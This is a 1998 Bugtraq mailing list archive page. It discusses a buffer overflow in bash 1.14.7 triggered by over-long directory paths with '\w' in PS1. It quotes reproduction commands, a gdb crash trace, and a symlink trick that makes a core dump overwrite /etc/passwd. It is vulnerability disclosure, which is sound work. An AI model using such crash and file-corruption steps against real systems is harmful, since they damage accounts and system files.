Bugtraq mailing list archives
Re: Buffer overflow in bash 1.14.7(1)
From: jfay () STETSON EDU (Fiji)
Date: Thu, 10 Sep 1998 09:59:44 -0400
ummm....I notified Redhat back on April 3 about this bug. It seems that they weren't too interested back then in doing anything about...and it looks like they aren't too interested now in giving credit where credit is due. <copy of original message> Date: Fri, 3 Apr 1998 09:56:13 -0500 (EST) From: Fiji <jfay () stetson edu> To: bugs () redhat com Subject: found a bug. Well it looks like if you cd into /proc/self/root/proc/self/root...692 characters later.../proc/self/root it will core. So what happens if I create a directory structure that is huge... i.e. ~fiji/ggggggggggggggggggggggggggggggggggggggggggggggggggggggg ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg ggggggggggggggggggggggggggggggggggggggggg/ggg and so forth. now at the bottom of this sturcture let's do the following: ln -s /etc/passwd ~fiji/g*/g*/g*/g*/g*/g* core now if root for whatever reason decides to cd into this...then the shell will die and core which will follow the symlink and corrupt /etc/passwd. Thought you all might like to know...so why exactly do cores follow symlinks? -Fiji CIT Stetson University Unix System Administrator </copy or original message> -Fiji On Fri, 4 Sep 1998, Joao Manuel Carolino wrote:
Date: Fri, 4 Sep 1998 16:09:28 +0000 From: Joao Manuel Carolino <root () EINSTEIN DHIS EU ORG> To: BUGTRAQ () netspace org Subject: Buffer overflow in bash 1.14.7(1) If you cd in to a directory which has a path name larger than 1024 bytes and you have '\w' included in your PS1 environment variable (which makes the path to the current working directory appear in each command line prompt), a buffer overflow will occur. The following was tested on my machine, running Slackware 3.5: einstein:~# gdb bash [...] (gdb) r Starting program: /bin/bash bash# PS1='\w ' ~ cd /tmp /tmp mkdir `perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp cd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <sstone () pht co jp>
AAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x804ed72 in sigprocmask () (gdb) backtrace #0 0x804ed72 in sigprocmask () #1 0xe9 in ?? () #2 0x41414141 in ?? () Cannot access memory at address 0x41414141. Regards, Joao
Current thread:
- Re: Buffer overflow in bash 1.14.7(1), (continued)
- Re: Buffer overflow in bash 1.14.7(1) Michael Riepe (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Chet Ramey (Sep 08)
- sshd exploit? Navindra Umanee (Sep 05)
- Re: sshd exploit? Seth David Schoen (Sep 06)
- Reading read-protected devices in *BSD Hubert Feyrer (Sep 06)
- Re: Reading read-protected devices in *BSD Todd C. Miller (Sep 06)
- Re: Reading read-protected devices in *BSD Eivind Eklund (Sep 06)
- Another way to crash HP 5M/5N printers bwoodard () CISCO COM (Sep 05)
- Windows File Share Scanner ZyklonB Zombie (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Fiji (Sep 10)
- Re: Buffer overflow in bash 1.14.7(1) Razvan Dragomirescu (Sep 10)
- Fw: Exploit for SCO. Leshka (Sep 10)
- Re: Fw: Exploit for SCO. John W. Temples (Sep 11)
- ISS Vulnerability Alert: Windows Backdoors Update X-Force (Sep 10)
- security problems with jidentd Mitchell Blank Jr (Sep 10)
- Re: security problems with jidentd Scott Fuhrman (Sep 11)
- Cisco security notice: Cisco PIX and CBAC Fragmentation attack psirt () cisco com (Sep 11)
- Re: Buffer overflow in bash 1.14.7(1) //Stany (Sep 05)